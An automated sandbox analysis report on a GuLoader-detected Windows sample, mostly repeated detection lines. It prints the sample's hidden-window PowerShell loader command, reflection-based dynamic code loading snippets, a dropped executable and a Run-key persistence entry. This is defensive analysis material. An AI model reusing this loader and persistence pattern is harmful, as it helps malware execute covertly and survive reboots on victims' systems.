        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 17.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Yara detected GuLoader
        Source: Yara matchFile source: 00000001.00000002.3360987921.000000000C608000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Duffelcoat $Viseredesfholdsforenings $Kolonialhandler), (Dataskrms @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ville224 = [AppDomain]::CurrentDomain.Ge
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($fruiter)), $Stortudernaja).DefineDynamicModule($Ovulite, $false).DefineType($Forsvarsstabs, $Antipapistic, [System.MulticastDelegate])
        Suspicious powershell command line found
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,12_2_004044A4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0464CE80 push eax; mov dword ptr [esp], edx1_2_0464CE94
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_074DCEEC push eax; iretd 1_2_074DCEED
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_092B3241 push 8BD38B50h; iretd 1_2_092B3246
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_092B36E7 push 8BD68B50h; retf 1_2_092B36EC
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_092D472A push 00000058h; retf 1_2_092D473A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_092D4B20 push 763C485Bh; iretd 1_2_092D4B2F
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_092D1F0F push ebx; iretd 1_2_092D1F11
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_092D0B59 push eax; iretd 1_2_092D0B5B
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_092D6667 push ebp; ret 1_2_092D666D
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_092D4441 push ebp; iretd 1_2_092D4442
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_092D628D push edx; retf 1_2_092D62BD
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0044693D push ecx; ret 12_2_0044694D
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DB84
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DBAC
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00451D54 push eax; ret 12_2_00451D61
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0A4
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0CC
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_00444E71 push ecx; ret 13_2_00444E81
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_00414060 push eax; ret 14_2_00414074
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_00414060 push eax; ret 14_2_0041409C
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_00414039 push ecx; ret 14_2_00414049
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_00414060 push eax; ret 17_2_00414074
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_00414060 push eax; ret 17_2_0041409C
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_00414039 push ecx; ret 17_2_00414049
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_004164EB push 0000006Ah; retf 17_2_004165C4
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_00416553 push 0000006Ah; retf 17_2_004165C4
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_00416555 push 0000006Ah; retf 17_2_004165C4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeJump to dropped file
        Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chivey57Jump to behavior
        Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chivey57Jump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,13_2_004047CB
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
